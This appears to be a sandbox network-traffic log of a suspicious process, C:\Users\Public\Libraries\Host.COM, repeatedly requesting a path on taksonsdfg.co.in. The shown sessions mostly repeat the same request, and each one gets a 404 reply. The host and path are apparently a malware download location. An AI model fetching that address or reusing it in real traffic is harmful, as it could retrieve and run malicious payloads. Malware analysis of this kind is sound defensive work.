cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:39 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:39 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:39 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49775 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:40 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:41 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:40 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:41 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:41 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 49777 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:41 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:42 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:41 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:42 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:42 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 49779 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:42 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:43 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:43 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:43 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:43 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 49781 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:44 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:44 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:44 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:44 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:44 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 49783 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:45 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:45 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:45 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:45 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:45 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49785 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
Timestamp | Bytes transferred | Direction | Data
2024-10-14 02:29:46 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: taksonsdfg.co.in
2024-10-14 02:29:46 UTC | 416 | IN | HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1251
date: Mon, 14 Oct 2024 02:29:46 GMT
server: LiteSpeed
alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-10-14 02:29:46 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-10-14 02:29:46 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    25 | 192.168.2.4 | 49787 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:47 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:47 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:47 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:47 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:47 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    26 | 192.168.2.4 | 49789 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:48 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:48 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:48 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:48 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:48 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    27 | 192.168.2.4 | 49791 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:49 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:50 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:49 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:50 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:50 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    28 | 192.168.2.4 | 49793 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:50 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:51 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:51 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:51 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:51 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    29 | 192.168.2.4 | 49795 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:51 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:52 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:52 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:52 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:52 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    30 | 192.168.2.4 | 49797 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:53 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:53 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:53 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:53 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:53 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    31 | 192.168.2.4 | 49799 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:54 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:54 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:54 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:54 UTC952INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:54 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    32 | 192.168.2.4 | 49801 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:55 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:55 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:55 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:55 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:55 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    33 | 192.168.2.4 | 49803 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:56 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:56 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:56 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:56 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:56 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    34 | 192.168.2.4 | 49805 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:57 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                    Host: taksonsdfg.co.in
                                                                                    2024-10-14 02:29:57 UTC | 416 | IN | HTTP/1.1 404 Not Found
                                                                                    Connection: close
                                                                                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                    pragma: no-cache
                                                                                    content-type: text/html
                                                                                    content-length: 1251
                                                                                    date: Mon, 14 Oct 2024 02:29:57 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-10-14 02:29:57 UTC | 952 | IN
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                                    2024-10-14 02:29:57 UTC | 299 | IN
                                                                                    Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    35 | 192.168.2.4 | 49807 | 108.170.55.202 | 443 | 7652 | C:\Users\Public\Libraries\Host.COM
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    2024-10-14 02:29:58 UTC | 178 | OUT | GET /34243456dfgd/255_Znrgbbhcbyx HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
